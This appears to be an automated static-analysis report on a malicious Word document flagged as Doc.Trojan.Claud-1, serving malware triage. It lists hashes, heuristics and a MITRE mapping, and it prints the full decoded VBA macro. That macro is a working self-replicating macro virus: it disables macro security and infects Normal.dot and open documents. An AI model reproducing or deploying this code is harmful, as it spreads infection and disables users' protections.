Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2c95d63fd080a8e2…

MALICIOUS

Office (OLE)

Size: 786.0 KB
Created: 2005-08-31 13:53:00
Authoring application: Microsoft Word 11.1
First seen: 2018-06-21
MD5: d8954bf0eb4c329cba4f3f9d5ad8b6cd
SHA-1: a08e8297b6820de55ca838620b344a6f8463d654
SHA-256: 2c95d63fd080a8e2cb339f534f18593dc31e9058014abdb5086b63e8dca72bfd
Risk Score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The critical ClamAV heuristic indicates this is a malicious document, specifically identified as Doc.Trojan.Claud-1. The VBA macro code within the 'macros.bas' script attempts to infect the Normal.dot template, which is a common persistence mechanism for macro-based malware. This allows the malicious macro to be present in all new documents created by the user.

Heuristics (2)

  • ClamAV: Doc.Trojan.Claud-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Claud-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1853 bytes
SHA-256: 0917b9cf0555e93e64d25cfe6b0cf8e180143596c972f55900209eaadd2f3678
Detection: ClamAV: Doc.Trojan.Claud-1
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Claudio2"
Attribute VB_Base = "1Normal.Claudio2"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_close()
On Error Resume Next
Dim jota As Integer, i As Integer, y As Integer, cadecodi As String
 Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
 Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
  CommandBars("tools").Controls("macro").Enabled = False
  Options.VirusProtection = False
  y = 0
  If AD.Name = "Claudio2" Then GoTo InfectNormal
  i = NT.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
Claudio:
  jota = 0
  jota = AD.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
  If jota = 0 Then
   jota = i
   Do While y < NT.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc)
     y = y + 1
     cadecodi = NT.CodeModule.Lines(jota, 1)
     AD.CodeModule.InsertLines y, cadecodi
     jota = jota + 1
   Loop
   AD.Name = "Claudio2"
   ActiveDocument.SaveAs ActiveDocument.FullName
  Else
    AD.CodeModule.ReplaceLine jota, "Sub Claudio"
    GoTo Claudio
  End If
 GoTo IYGH
InfectNormal:
If NT.Name <> "Claudio2" Then
i = AD.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
jota = 0
jota = NT.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
  If jota = 0 Then
   jota = i
   Do While y < AD.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc)
     y = y + 1
     cadecodi = AD.CodeModule.Lines(jota, 1)
     NT.CodeModule.InsertLines y, cadecodi
     jota = jota + 1
   Loop
   NT.Name = "Claudio2"
   NormalTemplate.Save
  Else
    NT.CodeModule.ReplaceLine jota, "Sub Claudio"
    GoTo InfectNormal
  End If
 End If
IYGH:
'This is a V macro, made by c l a u d I o
'This is the beginning of the era of the V Claudio
End Sub